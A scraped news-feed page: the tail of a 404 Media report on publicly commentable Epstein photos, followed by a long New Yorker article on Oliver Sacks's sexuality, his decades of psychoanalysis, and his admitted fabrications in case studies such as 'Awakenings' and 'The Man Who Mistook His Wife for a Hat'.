“Noam Chomsky,” Alya Colours (a frequent Epstein dropbox commenter) said below a photograph of the linguist talking to Epstein on a plane. Below this there is a little prompt from Dropbox asking me to “join the conversation” next to a smiley face.

In another picture, director Woody Allen is bundled up to his eyes in a heavy coat while Epstein side hugs him. “Yep, I’d know that face anywhere,” Susan Brown commented .

Among the pictures is a closeup of a prescription bottle labeled Phenazopyridine. “This is a medication used to treat pain from urinary tract infections,” Rebecca Stinton added, helpfully, in the comments.

“The fuck were they doing all that math for?” BedeScarlet said next to a picture of Epstein in front of a whiteboard covered in equations .

“Shit probably tastes like ass,” he added to a picture of Epstein cooking something in a kitchen.

There are darker and weird photographs in this collection of images that, as of this writing, do not yet have comments. There’s a pair of box springs in an unfinished room lit by the sun. There is a map of Little St James indicating where Epstein wants various buildings constructed. Bill Gates is shown in two photos standing next to women with their faces blocked out .

And then there are the Lolita pictures. A woman’s foot sits in the foreground, a worn annotated copy of Vladimir Nabokov novel Lolita in the background. “She was Lo, plain Lo, in the morning, standing four feet teen in one sock,” is written on the foot, a quote from the novel.

These photos are followed by a series of pictures of passports with the information redacted. Some are from Ukraine. There’s one from South Africa and another from the Czech Republic.

The House Democrats allowing the public to comment on these photos is funny and it’s unclear if intentional or a mistake. It’s also a continuation of the just-get-out-there approach when they have published other material, with it sometimes being in unsorted caches that readers then have to dig through. The only grand revelation in the new material is that Brooks was present at a dinner with Epstein in 2011.

“As a journalist, David Brooks regularly attends events to speak with noted and important business leaders to inform his columns, which is exactly what happened at this 2011 event. Mr. Brooks had no contact with him before or after this single attendance at a widely-attended dinner,” a Times spokesperson told Semafor’s Max Tani .

House Oversight Democrats did not immediately return 404 Media’s request for comment.

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Oliver Sacks put himself into his case studies – what was the cost?

Hacker News

www.newyorker.com

2025-12-18 20:52:38

Comments...

Original Article

When Oliver Sacks arrived in New York City, in September, 1965, he wore a butter-colored suit that reminded him of the sun. He had just spent a romantic week in Europe travelling with a man named Jenö Vincze, and he found himself walking too fast, fizzing with happiness. “My blood is champagne,” he wrote. He kept a letter Vincze had written him in his pocket all day, feeling as if its pages were glowing. Sacks had moved to New York to work as a fellow in neuropathology at the Albert Einstein College of Medicine, in the Bronx, and a colleague observed that he was “walking on air.” Every morning, he carefully polished his shoes and shaved. He adored his bosses. “I smile like a lighthouse in all directions,” he wrote Vincze.

Sacks was thirty-two, and he told Vincze that this was his first romantic relationship that was both physical and reciprocal. He felt he was part of a “two man universe,” seeing the world for the first time—“seeing it clear, and seeing it whole.” He wandered along the shipping piers on the Hudson River, where gay men cruised, with a notebook that he treated as a diary and as an endless letter to Vincze. “To watch life with the eyes of a homosexual is the greatest thing in the world,” Vincze had once told Sacks.

Sacks’s mother, a surgeon in London, had suspected that her son was gay when he was a teen-ager. She declared that homosexuality was an “abomination,” using the phrase “filth of the bowel” and telling him that she wished he’d never been born. They didn’t speak of the subject again. Sacks had moved to America—first to California and then, after five years, to New York—because, he wrote in his journal, “I wanted a sexual and moral freedom I felt I could never have in England.” That fall, during Yom Kippur, he decided that, rather than going to synagogue to confess “to the total range of human sin,” a ritual he’d grown up with, he’d spend the night at a bar, enjoying a couple of beers. “What I suppose I am saying, Jenö, is that I now feel differently about myself, and therefore about homosexuality as a whole,” he wrote. “I am through with cringing, and apologies, and pious wishes that I might have been ‘normal.’ ” (The Oliver Sacks Foundation shared with me his correspondence and other records, as well as four decades’ worth of journals—many of which had not been read since he wrote them.)

In early October, Sacks sent two letters to Vincze, but a week passed without a reply. Sacks asked his colleagues to search their mailboxes, in case the letter had been put in the wrong slot. Within a few days, however, he had given up on innocent explanations. He began dressing sloppily. He stopped coming to work on time. He had sex with a series of men who disgusted him.

After two weeks, Vincze, who was living in Berlin, sent a letter apologizing for his delayed reply and reiterating his love. He explained that he was so preoccupied by thoughts of Sacks that he felt as if he were living in a “Klaudur,” a German word that Vincze defined as a “spiritual cell.” He seems to have misspelled Klausur , which refers to an enclosed area in a monastery, but Sacks kept using the misspelled word, becoming obsessed with it. “It ramifies in horrible associations,” he wrote Vincze. “The closing of a door. Klaudur, claustrophobia, the sense of being shut in.” Sacks had long felt as if he were living in a cell, incapable of human contact, and this word appeared to be all he needed to confirm that the condition was terminal. The meaning of the word began morphing from “spiritual cell” to “psychotic cage.”

Two people looking at their dog chewing a cigar while rolling around in poker chips and playing cards.

The intimacy Sacks had rejoiced in now seemed phony, a “folie à deux”—a two-person delusion. His doubts intensified for a month, then he cut off the relationship. “I must tear you out of my system, because I dare not be involved ,” he told Vincze, explaining that he barely remembered how he looked, or the sound of his voice. “I hope I will not be taken in like this again, and that—conversely—I will have the strength and clarity of mind to perceive any future such relationships as morbid at their inception, and to abort the folly of their further growth.”

Two months later, Sacks felt himself “slipping down the greased path of withdrawal, discontent, inability to make friends, inability to have sex, etc. etc. towards suicide in a New York apartment at the age of 32.” He took enormous amounts of amphetamines, to the point of hallucinating. A family friend, a psychiatrist who worked with Anna Freud, urged him to find a psychoanalyst. She wrote him that his homosexuality was “a very ‘secondary phenomenon’ ”: he was attracted to men as “a substitute for veering uncertainties of what/whom you could love other than as ‘idealizations’ of yourself.” A few weeks later, he started therapy with Leonard Shengold, a young psychiatrist who was deeply immersed in Manhattan’s psychoanalytic culture. “I think he is very good, and he has at least a very considerable local reputation,” Sacks wrote his parents, who helped to pay for the sessions, three times a week.

Sacks had elevated yet hazy ambitions at the time: he wanted to be a novelist, but he also wanted to become the “Galileo of the inward,” he told a mentor, and to write the neurological equivalent of Sigmund Freud’s “ Interpretation of Dreams .” He worked in wards with chronically ill and elderly patients who had been warehoused and neglected, and his prospects within academic medicine looked dim. “Have you published anything lately?” his father wrote him, in 1968. “Or have you found yourself temperamentally incapacitated from doing so?”

When Sacks began therapy, “my initial and ultimate complaint was of fixity —a feeling of not-going ,” he wrote in his journal. He regarded Shengold as “a sort of analytic machine.” But gradually Sacks came to feel that “I love him, and need him; that I need him—and love him.” He had planned to stay in New York City only for a few years, but he kept delaying his return to England so that he could reach “a terminable point in my analysis.” Shengold, who would eventually publish ten books about psychoanalysis, wrote that therapy requires a “long period of working through”—a term he defined as the “need to repeat emotional conflicts over and over in life” until the patient has the “freedom to own what is there to be felt.”

Sacks saw Shengold for half a century. In that time, Sacks became one of the world’s most prominent neurologists and a kind of founding father of medical humanities—a discipline that coalesced in the seventies, linking healing with storytelling. But the freedom that Shengold’s analysis promised was elusive. After Vincze, Sacks did not have another relationship for forty-four years. He seemed to be doing the “working through” at a remove—again and again, his psychic conflicts were displaced onto the lives of his patients. He gave them “some of my own powers , and some of my phantasies too,” he wrote in his journal. “I write out symbolic versions of myself.”

During Sacks’s neurology internship, in San Francisco, his childhood friend Eric Korn warned him that the residents at his hospital could sense he was gay. “For God’s sake, exercise what seems to you immoderate caution,” Korn wrote, in 1961. “Compartmentalize your life. Cover your tracks. Don’t bring in the wrong sort of guests to the hospital, or sign your name and address to the wrong sort of register.” He encouraged Sacks to read “Homosexuality: Disease or Way of Life?,” a best-selling book by Edmund Bergler, who argued that homosexuality was an “illness as painful, as unpleasant and as disabling as any other serious affliction,” but one that psychoanalysis could cure. “The book is full of interest,” Korn wrote. “He claims a potential 100% ‘cures’ (a term he chooses to employ because he knows it teases) which is worth investigating perhaps.”

Freud characterized homosexuality as a relatively normal variant of human behavior, but when psychoanalysis came to the United States, in the postwar years, homophobia took on new life. The historian Dagmar Herzog has described how, in the U.S., “reinventing psychoanalysis and reinventing homophobia went hand in hand.” Faced with men who persisted in their love for other men, American analysts commonly proposed celibacy as a stopgap solution. In the historian Martin Duberman’s memoir “ Cures ,” he writes that his psychoanalyst instructed him to “take the veil”—live celibately—so that he could be cured of his desire for men. Duberman agreed to these terms. The best he could get, he thought, was sublimation: instead of enjoying an “affective life,” he would make “some contribution to the general culture from which I was effectively barred.” Sacks, who was closeted until he was eighty, also followed this course.

Shengold had portraits of Charles Dickens, William Shakespeare, and Sigmund Freud in his office, on the Upper East Side. Like Sacks, he came from a literary Jewish family. He seemed deeply attuned to Sacks’s creative life, which took the form of ecstatic surges of literary inspiration followed by months of sterility and depression. “Do your best to enjoy and to work—it is the power of your mind that is crucial ,” Shengold wrote when Sacks was on a visit with his family in England. Sacks wrote in his journal that he’d dreamed he overheard Shengold telling someone, “Oliver is lacking in proper self-respect; he has never really appreciated himself, or appreciated others’ appreciation of him. And yet, in his way, he is not less gifted than Auden was.” Sacks woke up flushed with embarrassment and pleasure.

Unlike many of his contemporaries, Shengold was not a doctrinaire thinker, but he was still susceptible to psychoanalytic fashions. Reflecting on how he might have viewed living openly as a gay man at that time, Shengold’s daughter, Nina, told me, “I don’t know that was a door that Dad necessarily had wide open.” In several books and papers, Shengold, a prolific reader of Western literature, tried to understand the process by which troubled people sublimate their conflicts into art. In his 1988 book, “ Halo in the Sky: Observations on Anality and Defense ,” Shengold wrote about the importance of transforming “anal-sadistic drives”—he used the anus as a metaphor for primitive, dangerous impulses—into “adaptive and creative ‘making.’ ” When Sacks read the book, he wrote in his journal that it “made me feel I was ‘lost in anality’ (whatever this means).”

Before Vincze, Sacks had been in love with a man named Mel Erpelding, who once told him, Sacks wrote, that he “oozed sexuality, that it poured out through every pore, that I was alive and vibrant with sexuality (a positive-admiring way of putting things), but also that I was reeking and toxic with it.” (Erpelding, who ended up marrying a woman, never allowed his relationship with Sacks to become sexual.) In his early years of therapy, in the late sixties, Sacks resolved that he would give up both drugs and sex. It’s doubtful that Shengold encouraged his celibacy, but he may have accepted that sexual abstinence could be productive, at least for a time. Richard Isay, the first openly gay member of the American Psychoanalytic Association, said that, in the seventies, he’d “rationalized that maturity and mental health demanded the sublimation of sexual excitement in work.” Sacks told a friend, “Shengold is fond of quoting Flaubert’s words ‘the mind has its erections too.’ ”

For Sacks, writing seemed almost physiological, like sweating—an involuntary response to stimuli. He routinely filled a whole journal in two days. “Should I then put down my pen , my interminable Journal (for this is but a fragment of the journal I have kept all my life),” he asked, “and ‘start living’ instead?” The answer was almost always no. Sometimes Sacks, who would eventually publish sixteen books, wrote continuously in his journal for six hours. Even when he was driving his car, he was still writing—he set up a tape recorder so that he could keep developing his thoughts, which were regularly interrupted by traffic or a wrong turn. Driving through Manhattan one day in 1975, he reflected on the fact that his closets, stuffed with pages of writing, resembled a “grave bursting open.”

By the late sixties, Sacks had become, he wrote, “almost a monk in my asceticism and devotion to work.” He estimated that he produced a million and a half words a year. When he woke up in the middle of the night with an erection, he would cool his penis by putting it in orange jello. He told Erpelding, “I partly accept myself as a celibate and a cripple, but partly—and this is . . . the wonder of sublimation—am able to transform my erotic feelings into other sorts of love—love for my patients, my work, art, thought.” He explained, “I keep my distance from people, am always courteous, never close. For me (as perhaps for you) there is almost no room, no moral room.”

“I have some hard ‘confessing’ to do—if not in public, at least to Shengold—and myself,” Sacks wrote in his journal, in 1985. By then, he had published four books—“ Migraine ,” “ Awakenings ,” “ A Leg to Stand On ,” and “ The Man Who Mistook His Wife for a Hat ”—establishing his reputation as “our modern master of the case study,” as the Times put it. He rejected what he called “pallid, abstract knowing,” and pushed medicine to engage more deeply with patients’ interiority and how it interacted with their diseases. Medical schools began creating programs in medical humanities and “narrative medicine,” and a new belief took hold: that an ill person has lost narrative coherence, and that doctors, if they attend to their patients’ private struggles, could help them reconstruct a new story of their lives. At Harvard Medical School, for a time, students were assigned to write a “book” about a patient. Stories of illness written by physicians (and by patients) began proliferating, to the point that the medical sociologist Arthur Frank noted, “ ‘Oliver Sacks’ now designates not only a specific physician author but also a . . . genre—a distinctively recognizable form of storytelling.”

But, in his journal, Sacks wrote that “a sense of hideous criminality remains (psychologically) attached” to his work: he had given his patients “powers (starting with powers of speech) which they do not have.” Some details, he recognized, were “pure fabrications.” He tried to reassure himself that the exaggerations did not come from a shallow place, such as a desire for fame or attention. “The impulse is both ‘purer’—and deeper,” he wrote. “It is not merely or wholly a projection —nor (as I have sometimes, ingeniously-disingenuously, maintained) a mere ‘sensitization’ of what I know so well in myself. But (if you will) a sort of autobiography .” He called it “ symbolic ‘exo-graphy.’ ”

Sacks had “misstepped in this regard, many many times, in ‘Awakenings,’ ” he wrote in another journal entry, describing it as a “source of severe, long-lasting, self-recrimination.” In the book , published in 1973, he startled readers with the depth of his compassion for some eighty patients at Beth Abraham Hospital, in the Bronx, who had survived an epidemic of encephalitis lethargica, a mysterious, often fatal virus that appeared around the time of the First World War. The patients had been institutionalized for decades, in nearly catatonic states. At the time, the book was met with silence or skepticism by other neurologists—Sacks had presented his findings in a form that could not be readily replicated, or extrapolated from—but, to nonspecialists, it was a masterpiece of medical witnessing. The Guardian would name it the twelfth-best nonfiction book of all time.

Child watches parent draw their signature at a credit card machine.

Sacks spent up to fifteen hours a day with his patients, one of the largest groups of post-encephalitic survivors in the world. They were “mummified,” like “living statues,” he observed. A medicine called L-dopa, which elevates the brain’s dopamine levels, was just starting to be used for Parkinson’s disease, on an experimental basis, and Sacks reasoned that his patients, whose symptoms resembled those of Parkinson’s, could benefit from the drug. In 1969, within days of giving his patients the medication, they suddenly “woke up,” their old personalities intact. Other doctors had dismissed these patients as hopeless, but Sacks had sensed that they still had life in them—a recognition that he understood was possible because he, too, felt as if he were “buried alive.”

In “ Awakenings ,” Sacks writes about his encounters with a man he calls Leonard L. “What’s it like being the way you are?” Sacks asks him the first time they meet. “Caged,” Leonard replies, by pointing to letters of the alphabet on a board. “Deprived. Like Rilke’s ‘Panther’ ”—a reference to a poem by Rainer Maria Rilke about a panther pacing repetitively in cramped circles “around a center / in which a mighty will stands paralyzed.”

When Sacks was struggling to write his first book, “ Migraine ,” he told a friend that he felt like “Rilke’s image of the caged panther, stupefied, dying, behind bars.” In a letter to Shengold, he repeated this image. When Sacks met Leonard, he jotted down elegant observations in his chart (“Quick and darting eye movements are at odds with his general petrified immobility”), but there is no mention of Leonard invoking the Rilke poem.

In the preface to “ Awakenings ,” Sacks acknowledges that he changed circumstantial details to protect his patients’ privacy but preserved “what is important and essential—the real and full presence of the patients themselves.” Sacks characterizes Leonard as a solitary figure even before his illness: he was “continually buried in books, and had few or no friends, and indulged in none of the sexual, social, or other activities common to boys of his age.” But, in an autobiography that Leonard wrote after taking L-dopa, he never mentions reading or writing or being alone in those years. In fact, he notes that he spent all his time with his two best friends—“We were inseparable,” he writes. He also recalls raping several people. “We placed our cousin over a chair, pulled down her pants and inserted our penises into the crack,” he writes on the third page, in the tone of an aging man reminiscing on better days. By page 10, he is describing how, when he babysat two girls, he made one of them strip and then “leaped on her. I tossed her on her belly and pulled out my penis and placed it between her buttocks and started to screw her.”

In “ Awakenings ,” Sacks has cleansed his patient’s history of sexuality. He depicts him as a man of “most unusual intelligence, cultivation, and sophistication”—the “ ‘ideal’ patient.” L-dopa may have made Leonard remember his childhood in a heightened sexual register—his niece and nephew, who visited him at the hospital until his death, in 1981, told me that the drug had made him very sexual. But they said that he had been a normal child and adolescent, not a recluse who renounced human entanglement for a life of the mind.

Sacks finished writing “Awakenings” rapidly in the weeks after burying his mother, who’d died suddenly, at the age of seventy-seven. He felt “a great open torrent—and release ,” he wrote in his journal. “It seems to be surely significant that ‘Awakenings’ finally came forth from me like a cry after the death of my own mother.” He referred to the writing of the book as his “Great Awakening,” the moment he “came out.” He doesn’t mention another event of significance: his patients had awakened during the summer of the Stonewall riots, the beginning of the gay-rights movement.

Shengold once told Sacks that he had “never met anyone less affected by gay liberation.” (Shengold supported his own son when he came out as gay, in the eighties.) Sacks agreed with the characterization. “I remain resolutely locked in my cell despite the dancing at the prison gates,” he said, in 1984.

In “Awakenings,” his patients are at first overjoyed by their freedom; then their new vitality becomes unbearable. As they continue taking L-dopa, many of them are consumed by insatiable desires. “L-DOPA is wanton, egotistical power,” Leonard says in the book. He injures his penis twice and tries to suffocate himself with a pillow. Another patient is so aroused and euphoric that she tells Sacks, “My blood is champagne”—the phrase Sacks used to describe himself when he was in love with Vincze. Sacks begins tapering his patients’ L-dopa, and taking some of them off of it completely. The book becomes a kind of drama about dosage: an examination of how much aliveness is tolerable, and at what cost. Some side effects of L-dopa, like involuntary movements and overactivity, have been well documented, but it’s hard not to wonder if “Awakenings” exaggerates the psychological fallout—Leonard becomes so unmanageable that the hospital moves him into a “punishment cell”—as if Sacks is reassuring himself that free rein of the libido cannot be sustained without grim consequence.

After “Awakenings,” Sacks intended his next book to be about his work with young people in a psychiatric ward at Bronx State Hospital who had been institutionalized since they were children. The environment reminded Sacks of a boarding school where he had been sent, between the ages of six and nine, during the Second World War. He was one of four hundred thousand children evacuated from London without their parents, and he felt abandoned. He was beaten by the headmaster and bullied by the other boys. The ward at Bronx State “exerted a sort of spell on me,” Sacks wrote in his journal, in 1974. “I lost my footing of proper sympathy and got sucked, so to speak, into an improper ‘perilous condition’ of identification to the patients.”

Shengold wrote several papers and books about a concept he called “soul murder”—a category of childhood trauma that induces “a hypnotic living-deadness, a state of existing ‘as if’ one were there.” Sacks planned to turn his work at Bronx State into a book about “ ‘SOUL MURDER’ and ‘SOUL SURVIVAL,’ ” he wrote. He was especially invested in two young men on the ward whom he thought he was curing. “The miracle-of-recovery started to occur in and through their relation to me (our relation and feelings to each other , of course),” he wrote in his journal. “We had to meet in a passionate subjectivity, a sort of collaboration or communication which transcended the Socratic relation of teacher-and-pupil.”

In a spontaneous creative burst lasting three weeks, Sacks wrote twenty-four essays about his work at Bronx State which he believed had the “beauty, the intensity, of Revelation . . . as if I was coming to know, once again, what I knew as a child, that sense of Dearness and Trust I had lost for so long.” But in the ward he sensed a “dreadful silent tension.” His colleagues didn’t understand the attention he was lavishing on his patients—he got a piano and a Ping-Pong table for them and took one patient to the botanical garden. Their suspicion, he wrote in his journal, “centred on the unbearability of my uncategorizability.” As a middle-aged man living alone—he had a huge beard and dressed eccentrically, sometimes wearing a black leather shirt—Sacks was particularly vulnerable to baseless innuendo. In April, 1974, he was fired. There had been rumors that he was molesting some of the boys.

That night, Sacks tore up his essays and then burned them. “Spite! Hate! Hateful spite!” he wrote in his journal shortly after. “And now I am empty—empty handed, empty hearted, desolate.”

The series of events was so distressing that even writing about it in his journal made Sacks feel that he was about to die. He knew that he should shrug off the false accusations as “vile idle gossip thrown by tiddlers and piddlers,” he wrote. But he couldn’t, because of “the parental accusation which I have borne—a Kafka-esque cross, guilt without crime, since my earliest days.”

The historian of medicine Henri Ellenberger observed that psychiatry owes its development to two intertwined dynamics: the neuroses of its founders—in trying to master their own conflicts, they came to new insights and forms of therapy—and the prolonged, ambiguous relationships they had with their patients. The case studies of these relationships, Ellenberger wrote, tended to have a distinct arc: psychiatrists had to unravel their patients’ “pathogenic secret,” a hidden source of hopelessness, in order to heal them.

Sacks’s early case studies also tended to revolve around secrets, but wonderful ones. Through his care, his patients realized that they had hidden gifts—for music, painting, writing—that could restore to them a sense of wholeness. The critic Anatole Broyard, recounting his cancer treatment in the Times Magazine in 1990, wrote that he longed for a charismatic, passionate physician, skilled in “empathetic witnessing.” In short, he wrote, a doctor who “would resemble Oliver Sacks.” He added, “He would see the genius of my illness.”

It speaks to the power of the fantasy of the magical healer that readers and publishers accepted Sacks’s stories as literal truth. In a letter to one of his three brothers, Marcus, Sacks enclosed a copy of “ The Man Who Mistook His Wife for a Hat ,” which was published in 1985, calling it a book of “fairy tales.” He explained that “these odd Narratives—half-report, half-imagined, half-science, half-fable, but with a fidelity of their own—are what I do, basically, to keep MY demons of boredom and loneliness and despair away.” He added that Marcus would likely call them “confabulations”—a phenomenon Sacks explores in a chapter about a patient who could retain memories for only a few seconds and must “ make meaning, in a desperate way, continually inventing, throwing bridges of meaning over abysses,” but the “bridges, the patches, for all their brilliance . . . cannot do service for reality.”

Sacks was startled by the success of the book, which he had dedicated to Shengold, “my own mentor and physician.” It became an international best-seller, routinely assigned in medical schools. Sacks wrote in his journal,

Guilt has been much greater since ‘Hat’ because of (among other things)

My lies,

falsification

He pondered the phrase “art is the lie that tells the truth,” often attributed to Picasso, but he seemed unconvinced. “I think I have to thrash this out with Shengold—it is killing me, soul-killing me,” he wrote. “My ‘cast of characters’ (for this is what they become) take on an almost Dickensian quality.”

Sacks once told a reporter that he hoped to be remembered as someone who “bore witness”—a term often used within medicine to describe the act of accompanying patients in their most vulnerable moments, rather than turning away. To bear witness is to recognize and respond to suffering that would otherwise go unseen. But perhaps bearing witness is incompatible with writing a story about it. In his journal, after a session with a patient with Tourette’s syndrome, Sacks describes the miracle of being “enabled to ‘feel’—that is, to imagine, with all the powers of my head and heart—how it felt to be another human being.” Empathy tends to be held up as a moral end point, as if it exists as its own little island of good work. And yet it is part of a longer transaction, and it is, fundamentally, a projection. A writer who imagines what it’s like to exist as another person must then translate that into his own idiom—a process that Sacks makes particularly literal.

“I’ll tell you what you are saying,” Sacks told a woman with an I.Q. of around 60 whose grandmother had just died. “You want to go down below and join your dead grandparents down in the Kingdom of Death.” In the conversation, which Sacks recorded, the patient becomes more expressive under the rare glow of her doctor’s sustained attention, and it’s clear that she is fond of him. But he is so excited about her words (“One feels that she is voicing universal symbols,” he says in a recording, “symbols which are infinite in meaning”) that he usurps her experience.

“I know, in a way, you don’t feel like living,” Sacks tells her, in another recorded session. “Part of one feels dead inside, I know, I know that. . . . One feels that one wants to die, one wants to end it, and what’s the use of going on?”

“I don’t mean it in that way,” she responds.

“I know, but you do, partly,” Sacks tells her. “I know you have been lonely all your life.”

Tourists take photos next to giant casserole dish.

The woman’s story is told, with details altered, in a chapter in “Hat” titled “Rebecca.” In the essay, Rebecca is transformed by grief for her grandmother. She reminds Sacks of Chekhov’s Nina, in “The Seagull,” who longs to be an actress. Though Nina’s life is painful and disappointing, at the end of the play her suffering gives her depth and strength. Rebecca, too, ends the story in full flower. “Rather suddenly, after her grandmother’s death,” Sacks writes, she becomes decisive, joining a theatre group and appearing to him as “a complete person, poised, fluent,” a “natural poet.” The case study is presented as an ode to the power of understanding a patient’s life as a narrative, not as a collection of symptoms. But in the transcripts of their conversations—at least the ones saved from the year that followed, as well as Sacks’s journals from that period—Rebecca never joins a theatre group or emerges from her despair. She complains that it’s “better that I shouldn’t have been born,” that she is “useless,” “good for nothing,” and Sacks vehemently tries to convince her that she’s not. Instead of bearing witness to her reality, he reshapes it so that she, too, awakens.

Some of the most prominent nonfiction writers of Sacks’s era ( Joseph Mitchell , A. J. Liebling , Ryszard Kapuściński ) also took liberties with the truth, believing that they had a higher purpose: to illuminate the human condition. Sacks was writing in that spirit, too, but in a discipline that depends on reproducible findings. The “most flagrant example” of his distortions, Sacks wrote in his journal, was in one of the last chapters of “Hat,” titled “The Twins,” about twenty-six-year-old twins with autism who had been institutionalized since they were seven. They spend their days reciting numbers, which they “savored, shared” while “closeted in their numerical communion.” Sacks lingers near them, jotting down the numbers, and eventually realizes that they are all prime. As a child, Sacks used to spend hours alone, trying to come up with a formula for prime numbers, but, he wrote, “I never found any Law or Pattern for them—and this gave me an intense feeling of Terror, Pleasure, and—Mystery.” Delighted by the twins’ pastime, Sacks comes to the ward with a book of prime numbers which he’d loved as a child. After offering his own prime number, “they drew apart slightly, making room for me, a new number playmate, a third in their world.” Having apparently uncovered the impossible algorithm that Sacks had once wished for, the twins continue sharing primes until they’re exchanging ones with twenty digits. The scene reads like a kind of dream: he has discovered that human intimacy has a decipherable structure, and identified a hidden pattern that will allow him to finally join in.

Before Sacks met them, the twins had been extensively studied because of their capacity to determine the day of the week on which any date in the calendar fell. In the sixties, two papers in the American Journal of Psychiatry provided detailed accounts of the extent of their abilities. Neither paper mentioned a gift for prime numbers or math. When Sacks wrote Alexander Luria, a Russian neuropsychologist, about his work with the twins, in 1973, he also did not mention any special mathematical skills. In 2007, a psychologist with a background in learning theory published a short article in the Journal of Autism and Developmental Disorders , challenging Sacks’s assertion that these twins could spontaneously generate large prime numbers. Because this is not something that humans can reliably do, Sacks’s finding had been widely cited, and was theoretically “important for not only psychologists but also for all scientists and mathematicians,” the psychologist wrote. (The psychologist had contacted Sacks to ask for the title of his childhood book of prime numbers, because he couldn’t find a book of that description, but Sacks said that it had been lost.) Without pointing to new evidence, another scientist wrote in Sacks’s defense, describing his case study as “the most compelling account of savant numerosity skills” and arguing, “This is an example of science at the frontier, requiring daring to advance new interpretations of partial data.”

After the publication of “Hat,” when Sacks was fifty-two years old, he wrote his friend Robert Rodman, a psychoanalyst, that “Shengold suggested, with some hesitancy, some months ago, that I should consider going deeper with him.” He added, “He also observes that I don’t complain, say, of sexual deprivation—though this is absolute.” At first, Sacks was worried that Shengold was preparing to dismiss him from treatment: “I’ve done all I can for you—now manage on your own!” Then he felt hopeful that he didn’t need to assume that “boredom-depression-loneliness-cutoffness” would define the rest of his life. He was also moved that, after twenty years, Shengold still considered him “worth extra work.”

But Sacks was shaken by the idea that they’d only been skimming the surface. He looked back through his notebooks and noticed “a perceptible decline in concern and passion,” which he felt had also dulled the quality of his thought. “Is the superficiality of my work, then, due to superficiality of relationships—to running away from whatever has deeper feeling and meaning?” he asked Rodman. “Is this perhaps spoken of, in a camouflaged way, when I describe the ‘superficialization’ of various patients?” As an example, he referenced an essay in “Hat” about a woman with a cerebral tumor. She was intelligent and amusing but seemed not to care about anyone. “Was this the ‘cover’ of some unbearable emotion?” he writes in the essay.

Sacks felt that Shengold was the reason he was still alive, and that he should go further with him. “What have I to lose?” he asked Rodman. But, he wrote, “what one has to lose, of course, may be just that quasi-stable if fragile ‘functioning’ . . . so there is reason to hesitate.” Going deeper would also mean more fully submitting to someone else’s interpretation, experiencing what he asked of his own patients; Rodman proposed that Sacks was “afraid of the enclosure of analysis, of being reduced and fixed with a formulated phrase.”

In the early eighties, Lawrence Weschler, then a writer for The New Yorker , began working on a biography of Sacks. Weschler came to feel that Sacks’s homosexuality was integral to his work, but Sacks didn’t want his sexuality mentioned at all, and eventually asked him to stop the project. “I have lived a life wrapped in concealment and wracked by inhibition, and I can’t see that changing now,” he told Weschler. In his journal, Sacks jotted down thoughts to share with Weschler on the subject: “My ‘sex life’ (or lack of it) is, in a sense irrelevant to the . . . sweep of my mind .” In another entry, he wrote that the Freudian term “sublimation” diminished the process he’d undergone. When he was still having sex, as a young man in California, he used to sheath his body in leather gear, so he was “totally encased, enclosed,” his real self sealed in a kind of “black box.” He wrote, “I have, in a sense , ‘outgrown’ these extraordinary, almost convulsive compulsions—but this detachment has been made possible by incorporating them into a vast and comprehending view of the world.” (Weschler became close friends with Sacks, and, after Sacks died, published a “biographical memoir” titled “And How Are You , Dr. Sacks?”)

It’s unclear whether Sacks did “go deeper” with Shengold. In the late eighties, Sacks wrote in his journal that he was “scared, horrified (but, in an awful way, accepting or complaisant) about my non-life.” He likened himself to a “pithed and gutted creature.” Rather than living, he was managing a kind of “homeostasis.”

In 1987, Sacks had an intense friendship with a psychiatrist named Jonathan Mueller, with whom he briefly fell in love. Mueller, who was married to a woman, told me that he did not realize Sacks had romantic feelings for him. Sacks eventually moved on. But he felt that the experience had altered him. “I can read ‘love stories’ with empathy and understanding—I can ‘ enter into them ’ in a way which was impossible before,” he wrote in his journal. He perceived, in a new light, what it meant for his patients in “Awakenings” to glimpse the possibility of “liberation”: like him, he wrote, they were seeking “not merely a cure but an indemnification for the loss of their lives.”

By the nineties, Sacks seemed to ask less of himself, emotionally, in relation to his patients. He had started working with Kate Edgar, who’d begun as his assistant but eventually edited his writing, organized his daily life, and became a close friend. (Shengold had encouraged Sacks to find someone to assist with his work. “The secretary is certainly an important ‘ego-auxiliary,’ ” he wrote him in a letter.) Edgar was wary about the way Sacks quoted his patients—they were suspiciously literary, she thought—and she checked to make sure he wasn’t getting carried away. She spent hours with some of his patients, and, she told me, “I never caught him in anything like that, which actually surprises me.”

Weschler told me that Sacks used to express anxiety about whether he’d distorted the truth. Weschler would assure him that good writing is not a strict account of reality; there has to be space for the writer’s imagination. He said he told Sacks, “Come on, you’re extravagantly romanticizing how bad you are—just as much as you were extravagantly romanticizing what the patient said. Your mother’s accusing voice has taken over.” Weschler had gone to Beth Abraham Hospital to meet some of the patients from “Awakenings” and had been shaken by their condition. “There’s a lot of people shitting in their pants, drooling—the sedimentation of thirty years living in a warehouse,” he said. “His genius was to see past that, to the dignity of the person. He would talk to them for an hour, and maybe their eyes would brighten only once—the rest of the time their eyes were cloudy—but he would glom onto that and keep talking.”

After “Hat,” Sacks’s relationship with his subjects became more mediated. Most of them were not his patients; many wrote to him after reading his work, recognizing themselves in his books. There was a different power dynamic, because these people already believed that they had stories to tell. Perhaps the guilt over liberties he had taken in “Hat” caused him to curb the impulse to exaggerate. His expressions of remorse over “making up, ‘enhancing,’ etc,” which had appeared in his journals throughout the seventies and eighties, stopped. In his case studies, he used fewer and shorter quotes. His patients were far more likely to say ordinary, banal things, and they rarely quoted literature. They still had secret gifts, but they weren’t redeemed by them; they were just trying to cope.

In “ An Anthropologist on Mars ,” from 1992, a book of case studies about people compensating for, and adapting to, neurological conditions, some of the richest passages are the ones in which Sacks allows his incomprehension to become part of the portrait. In a chapter called “Prodigies,” he wants badly to connect with a thirteen-year-old boy named Stephen, who is autistic and has an extraordinary ability to draw, but Stephen resists Sacks’s attempts at intimacy. He will not allow himself to be romanticized, a refusal that Sacks ultimately accepts: “Is Stephen, or his autism, changed by his art? Here, I think, the answer is no.” In this new mode, Sacks is less inclined to replace Stephen’s unknowable experience with his own fantasy of it. He is open about the discomfort, and even embarrassment, of his multiple failures to reach him: “I had hoped, perhaps sentimentally, for some depth of feeling from him; my heart had leapt at the first ‘Hullo, Oliver!’ but there had been no follow-up.”

